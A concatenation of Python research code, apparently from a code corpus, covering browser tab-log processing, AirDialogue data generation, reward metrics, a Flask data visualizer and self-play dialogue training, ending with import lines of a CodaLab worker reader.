snapshots.append(Snapshot(rows))
snapshots.sort(key=attrgetter('time'))
for tab in snapshots[0].tabs:
tab.init = True
snapshots[0].windows = list(set(map(attrgetter('windowId'), snapshots[0].tabs)))
for idx in range(len(snapshots) - 1):
fr = snapshots[idx]
to = snapshots[idx+1]
to.windows = list(set(map(attrgetter('windowId'), to.tabs)))
for tab in to.tabs:
tab.init = False
if tab.status == 'complete':
prevTab = fr.findTab(tab.id)
if prevTab != None and prevTab.status in ('complete', 'done'):
tab.status = 'done'
if tab.status == 'loading':
if (not fr.hasTab(tab.id)) or fr.findTab(tab.id).urlHash != tab.urlHash:
tab.init = True
fr.endTime = to.time
# skip last record because it has no endTime
snapshots.pop()
return snapshots
def loadFocus(fn):
focuses = []
with open(fn, 'rb') as csvfile:
csvreader = csv.reader(csvfile)
for row in csvreader:
if row[0] == 'action' or len(row) != 4:
continue
focus = Focus(row)
focuses.append(focus)
focuses.sort(key=attrgetter('time'))
return focuses
def loadNav(fn):
navs = []
with open(fn, 'rb') as csvfile:
csvreader = csv.reader(csvfile)
for row in csvreader:
if row[0] == 'from' or len(row) != 3:
continue
nav = Nav(row)
navs.append(nav)
navs.sort(key=attrgetter('time'))
return navs
def _trimByTime(a, s, e):
while a[0].time < s:
del a[0]
while a[-1].time > e:
del a[-1]
return a
def _getSnapshotForTime(snapshots, focus):
index = bisect_left(snapshots, focus)
snapshots = snapshots[max(0, index-5) : min(len(snapshots)-1, index+5)]
snapshots = filter(lambda snapshot: snapshot.hasTab(focus.id), snapshots)
diffs = []
for snapshot in snapshots:
diffs.append( abs(focus.time - snapshot.time) )
diffs = list(enumerate(diffs))
diffs.sort(key=itemgetter(1))
#_tabs = _.filter(tabs, (tab) -> tab.diff >= 500)
if len(diffs) > 0:
snapshots[diffs[0][0]].focuses.append(focus)
def addFocusToSnapshots(snapshots, focuses):
snapshots.sort(key=attrgetter('time'))
focuses.sort(key=attrgetter('time'))
snapshots = _trimByTime(snapshots, focuses[0].time, focuses[-1].time)
focuses = _trimByTime(focuses, snapshots[0].time, snapshots[-1].time)
for snapshot in snapshots:
snapshot.focuses = []
for focus in focuses:
_getSnapshotForTime(snapshots, focus)
lastFocus = None
for snapshot in snapshots:
snapshot.lastFocus = lastFocus
# fix race condition
for focus in snapshot.focuses:
focus.time = max(snapshot.time, focus.time)
focus.time = min(snapshot.endTime, focus.time)
if len(snapshot.focuses) > 0:
lastFocus = snapshot.focuses[-1]
return snapshots
def _getIdxForSnapshot(snapshot, snapshots):
index = bisect_left(snapshots, time)
start = max(0, index-25)
end = min(len(snapshots)-1, index+25)
snapshots = snapshots[start:end]
_snapshotIdx = next(ifilter(lambda x: x[1].snapshotId == snapshot.snapshotId, enumerate(snapshots)))[0]
return _snapshotIdx + start
def _getTabForIdTime(frTabId, toTabId, time, snapshots):
index = bisect_left(snapshots, time)
start = max(0, index-25)
end = min(len(snapshots)-1, index+25)
snapshots = snapshots[start:end]
snapshots = filter(lambda snapshot: snapshot.hasTab(toTabId) and snapshot.hasTab(frTabId) and snapshot.findTab(toTabId).init, snapshots)
diffs = []
for snapshot in snapshots:
diffs.append( abs(time - snapshot.time) )
diffs = list(enumerate(diffs))
diffs.sort(key=itemgetter(1))
if len(diffs) > 0:
snapshot = snapshots[diffs[0][0]]
return snapshot, snapshot.findTab(frTabId), snapshot.findTab(toTabId)
return None, None, None
def addNavToSnapshots(snapshots, navs):
for nav in navs:
snapshot, fr, to = _getTabForIdTime(nav.source, nav.target, nav.time, snapshots)
if to != None and fr != None:
to.source = fr
# propagate source info to future snapshots
snapshotIdx = next(ifilter(lambda x: x[1].snapshotId == snapshot.snapshotId, enumerate(snapshots)))[0]
for idx in range(snapshotIdx, len(snapshots)):
snapshot = snapshots[idx]
# this will fail to propagate on redirection, as init will be set in that case
#if (not snapshot.hasTab(nav.target)) or snapshot.findTab(nav.target).init:
if (not snapshot.hasTab(nav.target)):
break
snapshot.findTab(nav.target).tabSource = fr
def loadEverything(snapshotFn, focusFn, navFn):
print >> sys.stderr, 'Loading tab logs...',
snapshots = loadSnapshot(snapshotFn)
print >> sys.stderr, ' Done\nLoading focus logs...',
focuses = loadFocus(focusFn)
print >> sys.stderr, ' Done\nLoading nav logs...',
navs = loadNav(navFn)
print >> sys.stderr, ' Done'
print >> sys.stderr, 'Mapping focus to snapshots...',
addFocusToSnapshots(snapshots, focuses)
print >> sys.stderr, ' Done\nMapping nav to snapshots...',
addNavToSnapshots(snapshots, navs)
print >> sys.stderr, ' Done'
return snapshots, focuses, navs
``` |
{
"source": "josephch405/airdialogue",
"score": 3
} |
#### File: context_generator/src/customer.py
```python
import random
from . import utils
class Customer(object):
"""This class contains information of a customer."""
def __init__(self, facts_obj, book_window, airport_list):
# 1. origin and destination, airport_list guarantees to have unique locations
self.origin = random.randint(0, len(airport_list) - 1)
self.dest = random.randint(0, len(airport_list) - 1)
if self.dest == self.origin:
self.dest = (self.dest + 1) % len(airport_list)
self.dest = airport_list[self.dest]
self.origin = airport_list[self.origin]
# 2. date
base_time = facts_obj.base_departure_time_epoch
a_year_from_now = base_time + 3600 * 24 * 365
# randomly pick a date between base_time and a_year_from_now
self.departure_date = random.randint(base_time, a_year_from_now)
# return adte is book_window away from the departure date
self.return_date = self.departure_date + 3600 * 24 * book_window
# 4. passenger information
num_passengers = 1
self.passengers = []
len_first_name = len(facts_obj.first_name_list)
len_last_name = len(facts_obj.last_name_list)
# '_' will later be replaced in intent standalization
for _ in range(num_passengers):
self.passengers.append(
facts_obj.first_name_list[random.randint(0, len_first_name - 1)] +
'_' + facts_obj.last_name_list[random.randint(0, len_last_name - 1)])
# non-required fields during initial query
# 3. time
self.departure_time = utils.choice(
facts_obj.time_list, 1, p=facts_obj.time_prior)[0]
self.return_time = utils.choice(
facts_obj.time_list, 1, p=facts_obj.time_prior)[0]
# 5. class limit and price limit
self.class_limit = utils.choice(
facts_obj.class_list, 1, p=facts_obj.class_list_prior)[0]
# 6. price limist
if self.class_limit == 'all':
self.price_limit = facts_obj.price_limit_list[random.randint(
0,
len(facts_obj.price_limit_list) - 1)]
elif self.class_limit == 'economy':
self.price_limit = facts_obj.price_limit_list[random.randint(
0,
len(facts_obj.price_limit_list) - 2)]
elif self.class_limit == 'business':
self.price_limit = facts_obj.price_limit_list[random.randint(
1,
len(facts_obj.price_limit_list) - 1)]
# 7. num of connections
self.max_connection = utils.choice(
facts_obj.connection_member, 1, p=facts_obj.connection_prior)[0]
# 8. airline preference
self.airline = utils.choice(
facts_obj.airline_preference, 1,
p=facts_obj.airline_preference_prior)[0]
# 10 post process
self.departure_month, self.departure_day = utils.get_month_and_day(
facts_obj, self.departure_date)
self.return_month, self.return_day = utils.get_month_and_day(
facts_obj, self.return_date)
# 11 change reservation
self.goal = utils.choice([0, 1, 2], p=facts_obj.goal_probaility)
def get_departure_and_return_date(self):
return self.departure_date, self.return_date
def get_json(self):
"""This function serializes the object into a json."""
intention_jobject = {}
intention_jobject['departure_airport'] = self.origin
intention_jobject['return_airport'] = self.dest
intention_jobject['departure_month'] = self.departure_month
intention_jobject['departure_day'] = self.departure_day
intention_jobject['return_month'] = self.return_month
intention_jobject['return_day'] = self.return_day
intention_jobject['name'] = self.passengers[0]
intention_jobject['departure_time'] = self.departure_time
intention_jobject['return_time'] = self.return_time
intention_jobject['class'] = self.class_limit
intention_jobject['max_price'] = self.price_limit
intention_jobject['max_connections'] = self.max_connection
intention_jobject['airline_preference'] = self.airline
intention_jobject['goal'] = self.goal
# add departure and return date
intention_jobject['departure_date'] = self.departure_date
intention_jobject['return_date'] = self.return_date
return intention_jobject
def get_customer_condition(self):
"""This function returns the condition file."""
condition = self.get_json()
if condition['airline_preference'] == 'all':
del condition['airline_preference']
if condition['max_connections'] == 2:
del condition['max_connections']
if condition['class'] == 'all':
del condition['class']
if condition['departure_time'] == 'all':
del condition['departure_time']
if condition['return_time'] == 'all':
del condition['return_time']
return condition
```
#### File: evaluator/metrics/f1.py
```python
from collections import Counter
import re
import string
def f1_score(prediction, ground_truth):
prediction_tokens = list(normalize_answer(prediction))
ground_truth_tokens = list(normalize_answer(ground_truth))
common = Counter(prediction_tokens) & Counter(ground_truth_tokens)
num_same = sum(common.values())
# print num_same, common
if num_same == 0:
return 0
precision = 1.0 * num_same / len(prediction_tokens)
recall = 1.0 * num_same / len(ground_truth_tokens)
f1 = (2 * precision * recall) / (precision + recall)
return f1
def normalize_answer(s):
"""Lower text and remove punctuation, articles and extra whitespace."""
def remove_articles(text):
return re.sub(r'\b(a|an|the)\b', ' ', text)
def white_space_fix(text):
return ' '.join(text.split())
def remove_punc(text):
exclude = set(string.punctuation)
return ''.join(ch for ch in text if ch not in exclude)
def lower(text):
return text.lower()
return white_space_fix(remove_articles(remove_punc(lower(s))))
```
#### File: airdialogue/evaluator/selfplay_utils.py
```python
from airdialogue.evaluator.metrics.flight_distance import generate_scaled_flight
from airdialogue.evaluator.metrics import f1
def compute_reward_batch(utterance,
predicted_action,
actual_action_concat,
flight_db,
hparams,
alpha=0.5,
beta=0.2,
gamma=0.3):
"""Calcualte the reward for a batch."""
rewards = []
acc1 = []
acc2 = []
acc3 = []
discrete_score = []
ds1_arr = []
ds2_arr = []
ds3_arr = []
train_rw_arr = []
for pa, aa_con, fl in zip(predicted_action, actual_action_concat, flight_db):
aa = aa_con.split(' ')
rw, ac1, ac2, ac3 = compute_reward(pa, aa, fl)
rewards.append(rw)
acc1.append(ac1)
acc2.append(ac2)
acc3.append(ac3)
ds, ds1, ds2, ds3 = compute_01_score(pa, aa)
discrete_score.append(ds)
ds1_arr.append(ds1)
ds2_arr.append(ds2)
ds3_arr.append(ds3)
train_rw_arr.append(
get_training_reward(hparams, ac1, ac2, ac3, ds1, ds2, ds3))
return train_rw_arr, rewards, acc1, acc2, acc3, discrete_score, ds1_arr, ds2_arr, ds3_arr
def parse_action(action):
"""parse the action and consider multiple name scenario.
name will also appear first.
"""
name = ' '.join(action[0:-2])
flight = action[-2]
state = action[-1]
return name, flight, state
def compute_reward(predicted_action,
actual_action,
flight_db,
alpha=0.5,
beta=0.2,
gamma=0.3,
debug=False):
"""here we compute the scaled reward."""
predicted_name, predicted_flight, predicted_state = parse_action(
predicted_action)
actual_name, actual_flight, actual_state = parse_action(actual_action)
# this will do normalization including lower case and prouncation/space
# removal
score1 = f1.f1_score(predicted_name, actual_name)
score2 = 1 - generate_scaled_flight(predicted_flight, actual_flight,
flight_db)
score3 = float(predicted_state == actual_state)
reward_compliment = score1 * 0.2 + score2 * 0.5 + score3 * 0.3
acc1 = score1
acc2 = score2
acc3 = score3
return reward_compliment, acc1, acc2, acc3
```
#### File: airdialogue/prepro/standardize_data_lib.py
```python
from tensorflow.compat.v1.io import gfile
from tqdm import tqdm
import string
import json
printable = set(string.printable)
def add_dot(utt):
if utt.strip()[-1] != '.' and utt.strip()[-1] != '?':
return utt.strip() + '.'
else:
return utt.strip()
def standardize_message(utterances, time_stamp=None):
"""this function combines adjacent utternaces that belong to the same talker
into one. Sometimes time_stamp could be None.
For example
<t1> how are you. <t2> I am good. <t2> And you? <eod> <t1>
will be combined into
<t1> how are you. <t2> I am good. And you? <eod> <t1>
"""
new_utterance = []
new_time_stamp = []
for i, utt in enumerate(utterances):
if len(utt.strip()) == 0:
continue
utts = utt.split(':')
talker = utts[0]
sentence = ':'.join(utts[1:]).strip()
if len(sentence) == 0:
continue
if len(new_utterance) == 0 or talker != new_utterance[-1].split(':')[0]:
new_utterance.append(add_dot(utt))
if time_stamp:
new_time_stamp.append(time_stamp[i])
else:
new_utterance[-1] += ' ' + add_dot(sentence)
if time_stamp:
new_time_stamp[-1] = time_stamp[i]
return new_utterance, new_time_stamp
def delete_non_ascii(s):
return ''.join([x for x in s if x in printable])
def load_and_drop(data_file, kb_file, drop_incorrect=True, verbose=False):
""" this function filter incorrect samples without standardization."""
fin_data = gfile.GFile(data_file)
fin_kb = gfile.GFile(kb_file)
total_in_file = 0
loaded_data = []
loaded_kb = []
for line1 in tqdm(fin_data, desc='loading data'):
if len(line1.strip()) < 10:
continue
line2 = fin_kb.readline()
if len(line2.strip()) < 10:
continue
line1 = delete_non_ascii(line1)
line2 = delete_non_ascii(line2)
data_obj = json.loads(line1)
kb_obj = json.loads(line2)
if (not drop_incorrect) or (
'correct_sample' not in data_obj) or data_obj['correct_sample']:
loaded_data.append(data_obj)
loaded_kb.append(kb_obj)
total_in_file += 1
if verbose:
print(('loaded: ', len(loaded_data), '/', total_in_file, '=',
len(loaded_data) * 1.0 / total_in_file))
return loaded_data, loaded_kb
def load_and_drop_stream(data_file,
kb_file,
drop_incorrect=True,
verbose=False):
""" this function filter incorrect samples without standardization."""
if verbose:
print('loading stream')
fin_data = gfile.GFile(data_file)
if gfile.exists(kb_file):
fin_kb = gfile.GFile(kb_file)
else:
fin_kb = None
if verbose: print("gfile loaded: ", fin_data)
for line1 in fin_data:
if verbose:
print(line1)
if len(line1.strip()) < 10:
continue
line1 = delete_non_ascii(line1)
data_obj = json.loads(line1)
if fin_kb:
line2 = fin_kb.readline()
if len(line2.strip()) < 10:
continue
line2 = delete_non_ascii(line2)
kb_obj = json.loads(line2)
else:
kb_obj = None
if (not drop_incorrect) or (
'correct_sample' not in data_obj) or data_obj['correct_sample']:
yield data_obj, kb_obj
def standardize_and_drop(data_file,
kb_file,
drop_incorrect=True,
verbose=False):
""" this function filter incorrect samples and standardize them
the same time.
"""
loaded_data, loaded_kb = load_and_drop(data_file, kb_file, drop_incorrect,
verbose)
for data_obj in tqdm(loaded_data, desc='standardizing data'):
org_time = data_obj['timestamps'] if 'timestamps' in data_obj else None
org_diag = data_obj['dialogue'] if 'dialogue' in data_obj else None
if org_diag:
new_diag, new_time = standardize_message(org_diag, org_time)
data_obj['dialogue'] = new_diag
if new_time:
data_obj['timestamps'] = new_time
assert len(data_obj['dialogue']) == len(data_obj['timestamps'])
return loaded_data, loaded_kb
```
#### File: airdialogue/visualizer/visualizer_main.py
```python
import argparse
import json
import linecache
import os
from os.path import expanduser
from flask import Flask
from flask import request
from airdialogue.visualizer.utils import generate_html
import sys
def strip_prefix(name):
if name.endswith("data"):
return name[0:-5]
else:
return name[0:-3]
def get_partitions(path):
"""This function counts the number of occurries of the same prefix in the
json dir. If it happens more than twice we will use that as a valid
partition and add it to the partition list."""
all_files = os.listdir(path)
prefix_freq = {}
for f in all_files:
if f.endswith(".json"):
prefix = f.split(".")[0]
prefix = strip_prefix(prefix)
if prefix not in prefix_freq:
prefix_freq[prefix] = 0
prefix_freq[prefix] += 1
valid_partitions = []
for prefix in prefix_freq:
if prefix_freq[prefix] >= 2:
valid_partitions.append(prefix)
return valid_partitions
def wrapper(FLAGS):
def home():
# get all the partitions in the directory
expanded_data_path = expanduser(FLAGS.data_path)
partitions = get_partitions(expanded_data_path)
index = request.form.get("index")
if index:
index = int(index)
partition = request.form.get("partition")
if not partitions:
print("no data is found in the directory")
return """No partitions found under {0}. Supported partitions has to end
with .json extension.""".format(FLAGS.data_path)
if not partition:
# choose a default partition
if "train" in partitions:
partition = "train"
else:
partition = partitions[0].strip()
index = 1
try:
line_data = linecache.getline(
os.path.join(expanded_data_path, "{0}_data.json".format(partition)),
index)
line_kb = linecache.getline(
os.path.join(expanded_data_path, "{0}_kb.json".format(partition)),
index)
except:
return "Invalid index."
if (not line_data) and (not line_kb):
print("invalid partition number.")
data_object = json.loads(line_data)
kb_object = json.loads(line_kb)
html_source = generate_html(data_object, kb_object, index, partitions,
partition)
return html_source
return home
def add_arguments(parser):
"""Build ArgumentParser."""
parser.add_argument("--host", type=str, default="0.0.0.0",
help="host name for the visualizer.")
parser.add_argument("--port", type=int, default=5555,
help="port number of the visualizer server.")
parser.add_argument("--data_path", type=str, default=None,
help="path that stores data and kb files.")
def main(FLAGS):
app = Flask(__name__)
app.route("/", methods=["POST", "GET"])(wrapper(FLAGS))
app.run(host=FLAGS.host, port=FLAGS.port, debug=True)
if __name__ == "__main__":
this_parser = argparse.ArgumentParser()
add_arguments(this_parser)
FLAGS, unparsed = this_parser.parse_known_args()
main(FLAGS)
``` |
{
"source": "josephch405/airdialogue_model",
"score": 3
} |
#### File: josephch405/airdialogue_model/dialogue.py
```python
import math
import sys
import numpy as np
import tensorflow as tf
from utils import dialogue_utils
from utils import misc_utils as utils
class Conversation(object):
"""The Conversation class models the behavior of a single self-play conversation.
"""
def get_initial_utterance(self, speaker):
# the situation is different here because we removed a speaker flip right
# aftet this is initialized
if speaker == 0:
return ['<t1>'] # it means we let speaker 0 to talk now
else:
return ['<t2>']
def __init__(self, max_diag_len, turn1_token, turn2_token, num_utterance,
speaker):
self.utt_arr = []
self.action_arr = []
self.is_finished = []
self.turn1_token = turn1_token
self.turn2_token = turn2_token
self.max_diag_len = max_diag_len
for i in range(num_utterance):
self.utt_arr.append([])
self.is_finished.append(False)
self.action_arr.append([])
for i in range(num_utterance):
utt = self.get_initial_utterance(speaker)
self.utt_arr[i].extend(utt)
def get_start_and_end_token(self, speaker):
if speaker == 0:
begin_token = self.turn1_token
end_token = self.turn2_token
else:
begin_token = self.turn2_token
end_token = self.turn1_token
return begin_token, end_token
def process(self, new_utterances1, new_utterances2, actions, speaker,
last_round):
def apply_filter(filter_token, utterance):
try:
ind = utterance.index(filter_token)
# print ('ind found', ind,utterance[:ind] )
return utterance[:ind], True
except: # filter_token not found
return utterance, False
begin_token, end_token = self.get_start_and_end_token(speaker)
new_utterances_all = new_utterances1 if speaker == 0 else new_utterances2
for i, (np_utterance, ac) in enumerate(zip(new_utterances_all, actions)):
if self.is_finished[i]:
continue
new_utterances = []
for token in np_utterance:
new_utterances.append(token)
new_utterances = list(map(lambda bs: bs.decode(), new_utterances))
# 1. get sub_str before begin_tokens as they are invalid
new_utterances, _ = apply_filter(begin_token, new_utterances)
# 2. get sub_str before end token
new_utterances, _ = apply_filter(end_token, new_utterances)
# 3. get sub_str before end_of dialogue
new_utterances, terminated = apply_filter('<eod>', new_utterances)
# 4. cap on max_length
remaining_informative_words = self.max_diag_len - len(self.utt_arr[i]) - 1
if terminated:
remaining_informative_words -= 1 # we need to add <eod>
new_utterances = new_utterances[:remaining_informative_words]
new_utterances = list(new_utterances)
##### start putting it together
# 6. add eod
if terminated:
new_utterances.append('<eod>')
if terminated or last_round:
self.action_arr[i] = [s.decode() for s in ac]
self.is_finished[i] = True
# 7. add end token
new_utterances.append(end_token)
self.utt_arr[i].extend(new_utterances)
return sum(self.is_finished) == len(self.is_finished)
def get_train_data(self):
# print("self.utt_arr", self.utt_arr)
return self.utt_arr, self.action_arr
class SelfplayDialogue(object):
"""The SelfplayDialogue can be reused for multiple conversations."""
def __init__(self, mutable_model, immutable_model, mutable_sess,
immutable_sess, max_dialogue_turns, train_threadhold,
turn1_token, turn2_token, eod_token, summary_writer,
dialogue_mode, hparams):
# model and session
self.mutable_model = mutable_model
self.immutable_model = immutable_model
self.mutable_sess = mutable_sess
self.immutable_sess = immutable_sess
# iterators
self.mutable_handles = self.mutable_sess.run([
mutable_model.train_iterator.string_handle(),
mutable_model.self_play_ft_iterator.string_handle(),
mutable_model.self_play_st_iterator.string_handle()
])
self.immutable_handles = self.immutable_sess.run([
immutable_model.train_iterator.string_handle(),
immutable_model.self_play_ft_iterator.string_handle(),
immutable_model.self_play_st_iterator.string_handle()
])
self.iterator_mode = 1 # 1 is fulltext, 2 is structured
self.summary_writer = summary_writer
self.dialogue_mode = dialogue_mode
self.batch_size = hparams.self_play_batch_size
self.self_play_eval_batch_size = hparams.self_play_eval_batch_size
self.update_batch_size = hparams.self_play_update_batch_size
self.hparams = hparams
self.gamma = hparams.reward_discount
assert mutable_model.model.mode == dialogue_utils.mode_self_play_mutable
# parameters
self.max_dialogue_turns = max_dialogue_turns
# won't train the model until train_threadhold samples are reached
self.train_threadhold = train_threadhold
self.turn1_token = turn1_token
self.turn2_token = turn2_token
self.turn_tokens = [turn1_token, turn2_token]
self.eod_token = eod_token
# initialization
self.train_samples = []
self.train_counter = 0
self.train_it_initialized = False
##### stats on rl vs sl updates
self.num_rl_updates = 0
self.num_sl_updates = 0
def format_samples_batch(self,
batch_intent,
batch_pred_action,
batch_truth_action,
batch_utterance,
batch_reward_diag,
batch_reward_action,
batch_size,
boundary=None):
output_data = []
for i in range(batch_size):
utterance = ' '.join(batch_utterance[i])
if not boundary:
boundary1 = self.get_dialogue_boundary(self.turn_tokens[0], utterance,
self.turn_tokens[0],
self.turn_tokens[1])
boundary = boundary1[0] + boundary1[1]
str_b = []
for ele in boundary:
str_b.append(str(ele))
intent = batch_intent[i]
pred_action = batch_pred_action[i]
truth_action = batch_truth_action[i]
reward_diag, reward_action = batch_reward_diag[i], batch_reward_action[i]
arr = [
intent, pred_action, truth_action, utterance, ' '.join(str_b),
reward_diag, reward_action
]
output_data.append('|'.join(arr))
return output_data
def generate_utterance_ordinary(self, data, kb, self_play_model, sess,
batch_size, handles):
if self.iterator_mode == 1:
real_iterator = self_play_model.self_play_ft_iterator
else:
real_iterator = self_play_model.self_play_st_iterator
sess.run(
real_iterator.initializer,
feed_dict={
self_play_model.data_placeholder: data,
self_play_model.kb_placeholder: kb,
self_play_model.batch_size_placeholder: batch_size
})
iterator_handle = handles[self.iterator_mode]
res = self_play_model.model.generate_self_play_utterance(
sess, iterator_handle)
return res
def generate_utterance(self, batch_intent, conv, kb,
speaker, turn, batch_size):
# preapre output
utt = conv.get_train_data()
composit_data = self.format_samples_batch(
batch_intent=batch_intent,
batch_pred_action=['s'] * batch_size,
batch_truth_action=['s'] * batch_size,
batch_utterance=utt[0], # utterance
batch_reward_diag=['0.5'] * batch_size,
batch_reward_action=['0.5'] * batch_size,
batch_size=batch_size)
composit_kb = kb
self_play_model, sess, handles = self.agents[speaker]
new_utt1, new_utt2, new_action = self.generate_utterance_ordinary(
composit_data, composit_kb, self_play_model, sess, batch_size, handles)
all_finished = conv.process(new_utt1, new_utt2, new_action, speaker,
turn == self.max_dialogue_turns - 1)
return all_finished
def parse_input(self, batch_input_data, batch_input_kb):
batch_intent = []
batch_action = []
batch_kb = batch_input_kb
for input_data in batch_input_data:
intent, action = input_data.split('|')
batch_intent.append(intent)
batch_action.append(action)
return batch_intent, batch_action, batch_kb
def do_rl_training(self, data, kb, batch_size, model, sess, speaker,
global_step, self_play_handle):
if self.iterator_mode == 1:
self_play_iterator = model.self_play_ft_iterator
elif self.iterator_mode == 2:
self_play_iterator = model.self_play_st_iterator
else:
raise Exception('not defined self_play_mode')
# first do initialization
sess.run(
self_play_iterator.initializer,
feed_dict={
model.data_placeholder: data,
model.kb_placeholder: kb,
model.batch_size_placeholder: batch_size
})
# second, do training
res = model.model.self_play(sess, speaker, self_play_handle)
all_summaries = res[-1]
if self.summary_writer:
for key in all_summaries:
utils.add_summary(self.summary_writer, global_step,
self.dialogue_mode + '_' + key, all_summaries[key])
global_step = res[2]
self.num_rl_updates += 1
return global_step
def do_SL_training(self, model, sess, global_step, train_handle):
# first do initialization
if not self.train_it_initialized:
sess.run(
model.train_iterator.initializer,
feed_dict={model.skip_count_placeholder: 0})
self.train_it_initialized = True
# second, do training
while True: # keep tring until no exception
try:
res = model.model.self_play_train(sess, train_handle)
break
except tf.errors.OutOfRangeError:
sess.run(
model.train_iterator.initializer,
feed_dict={model.skip_count_placeholder: 0})
continue
all_summaries = res[-1]
if self.summary_writer:
for key in all_summaries:
utils.add_summary(self.summary_writer, global_step,
self.dialogue_mode + '_' + key, all_summaries[key])
global_step = res[-2]
self.num_sl_updates += 1
return global_step
def get_dialogue_boundary(self, start_token, flat_dialogue, start_of_turn1,
start_of_turn2):
def get_end_token(start, set_of_end_tokens, splitted_dialogues):
for i in range(start, len(splitted_dialogues)):
if splitted_dialogues[i] in set_of_end_tokens:
return i
assert False, 'end token not found :' + ' start=' + str(
start) + '/' + str(len(splitted_dialogues))
def get_next_start_token(end_position, start_token, splitted_dialogues):
for i in range(end_position, len(splitted_dialogues)):
if splitted_dialogues[i] == start_token:
return i
return len(splitted_dialogues)
set_of_end_tokens = set([
start_of_turn1, start_of_turn2
]) # taking out end_of_dialogue token because of dynamic rnn decoder
splitted_dialogue = flat_dialogue.split(' ')
i = get_next_start_token(0, start_token, splitted_dialogue)
all_starts = []
all_ends = []
while i < len(splitted_dialogue
) - 1: # we don't find the end token for the last turn change.
end_position = get_end_token(i + 1, set_of_end_tokens, splitted_dialogue)
assert splitted_dialogue[end_position] != start_token, (
'start token '
'appeared twice') + ''.join(flat_dialogue)
all_starts.append(i)
all_ends.append(end_position)
i = get_next_start_token(i + 1, start_token, splitted_dialogue)
return (all_starts, all_ends)
def scale_reward_batch(self, b_final_reward, gamma, b_diag):
batch_reward_diag = []
batch_reward_action = []
for final_reward, diag in zip(b_final_reward, b_diag):
diag_len = len(diag)
reward_len = diag_len + self.hparams.len_action
all_ind = list(range(reward_len - 1, -1, -1))
all_rewards = []
for i in range(len(all_ind)):
all_rewards.append(str(math.pow(gamma, all_ind[i]) * final_reward))
reward_diag = all_rewards[0:-1 * self.hparams.len_action]
reward_action = all_rewards[-1 * self.hparams.len_action:]
batch_reward_diag.append(' '.join(reward_diag))
batch_reward_action.append(' '.join(reward_action))
return batch_reward_diag, batch_reward_action
def maybe_train(self, sample, speaker, global_step, force=False):
self.train_samples.append(sample)
if force or len(self.train_samples) >= self.train_threadhold:
# first generate training examples
data_arr = []
kb_arr = []
for sample in self.train_samples: # each sample is a batch of data
intent, pred_action, truth_action, utterance, kb = sample # batch version
all_rewards = dialogue_utils.compute_reward_batch(
utterance, pred_action, truth_action, kb,
self.hparams) # batch version
train_reward, _, _, _, _, _, _, _, _ = all_rewards
final_reward = train_reward
reward_diag, reward_action = self.scale_reward_batch(
final_reward, self.gamma, utterance) # in batches
flat_pred_action = []
for k in range(len(pred_action)):
flat_pred_action.append(' '.join(pred_action[k]))
new_data_arr = self.format_samples_batch(
batch_intent=intent,
batch_pred_action=flat_pred_action,
batch_truth_action=truth_action,
batch_utterance=utterance,
batch_reward_diag=reward_diag,
batch_reward_action=reward_action,
batch_size=self.update_batch_size)
data_arr.extend(new_data_arr)
kb_arr.extend(kb)
data_output, kb_output = data_arr, kb_arr
new_global_step = None
self.train_samples = [] # clean up
self_play_hangle = self.mutable_handles[self.iterator_mode]
if self.hparams.rl_training:
new_global_step = self.do_rl_training(
data_output, kb_output, self.update_batch_size, self.mutable_model,
self.mutable_sess, speaker, global_step, self_play_hangle)
print('self.hparams.self_play_sl_multiplier=',
self.hparams.self_play_sl_multiplier)
if self.hparams.self_play_sl_multiplier >= 0: # train multiple or don't train at all
print('do', self.hparams.self_play_sl_multiplier, 'supervised training')
for _ in range(self.hparams.self_play_sl_multiplier):
new_global_step = self.do_SL_training(self.mutable_model,
self.mutable_sess, global_step,
self.mutable_handles[0])
else:
print('do one supervised traiing')
if self.train_counter >= abs(self.hparams.self_play_sl_multiplier):
new_global_step = self.do_SL_training(self.mutable_model,
self.mutable_sess, global_step,
self.mutable_handles[0])
self.train_counter = 0
else:
self.train_counter += 1
if self.summary_writer:
utils.add_summary(
self.summary_writer, new_global_step,
self.dialogue_mode + '_' + 'sl_rl',
self.num_sl_updates * 1.0 / (self.num_rl_updates + 0.0001))
return new_global_step
return None
def talk(self, max_diag_length, batch_input_data, batch_input_kb, agent1,
agent2, worker_step, batch_size, speaker=None):
"""The main procedure to generate a single self play conversation."""
# parse data
bs_intent, bs_truth_action, bs_kb = self.parse_input(
batch_input_data, batch_input_kb)
# remember the roles of agents
self.agents = [agent1, agent2]
# In selfplay training the speaker will be non and we randomly chose an
# initial speaker and initialize utterance.
# In selfplay evaluation the speaker will be specified so we use as is
if not speaker: speaker = int(np.random.random() < 0.5)
# generate the conversation instance for this conversation.
# print ('self.batch_size', self.batch_size)
conv = Conversation(max_diag_length, self.turn1_token, self.turn2_token,
batch_size, speaker)
# generate conversation by turn in batch mode until all conversations
# terminated (finished = True) or the number of turns reached the maximum.
turn = 0
finished = False
while (not finished) and turn < self.max_dialogue_turns:
finished = self.generate_utterance(bs_intent, conv,
bs_kb, speaker, turn, batch_size)
# Change the speaker as we move to the next turn.
speaker = (speaker + 1) % 2
turn += 1
all_rewards = dialogue_utils.compute_reward_batch(
conv.utt_arr, conv.action_arr, bs_truth_action, bs_kb, self.hparams)
metrics = dialogue_utils.calculate_reward_metrics(all_rewards)
metrics['num_turns'] = turn
# print out step stats only in debug mode
if self.summary_writer and self.hparams.debug:
for key in metrics:
utils.add_summary(self.summary_writer, worker_step,
self.dialogue_mode + '_' + key + '_ws', metrics[key])
utt_arr, bs_pred_action = conv.get_train_data()
if self.hparams.debug:
print('self_play debug: ' + bs_intent[0])
print('self_play debug: all_rewards', all_rewards[0])
print('self_play debug: ' + ' '.join(utt_arr[0]))
print('self_play debug: ' + ' '.join(bs_pred_action[0]))
sys.stdout.flush()
return (bs_intent, bs_pred_action, bs_truth_action, utt_arr,
bs_kb), turn, metrics
def flip_agent(self, mutable_agent, immutable_agent, flip='random'):
"""This function flips the role of mutable agent and immutable agent so that
they both have chances to play customer and agent. Remember both mutable
immutable models actually contain two sub-models: customer and agent. We
need to make sure that they have equal chances to serve as both parts when
doing the self play. In self play evaluation, this is chosen
deterministically based on the value of flip. In self play training, this
is chosen randomly.
"""
if flip == 'random':
flip = int(np.random.random() < 0.5)
if flip == 0:
# in the first flip mutable agent is agent 1 and immutable agent
# is agent 2.
return mutable_agent, immutable_agent, flip
else:
# in the second flip mutable agent is agent 2 and immutable agent
# is agent 1.
return immutable_agent, mutable_agent, flip
``` |
{
"source": "josephch405/codalab-worksheets",
"score": 3
} |
#### File: codalab/worker/reader.py
```python
from contextlib import closing
import http.client
import os
import threading
import codalab.worker.download_util as download_util
from codalab.worker.download_util import get_target_path, PathException
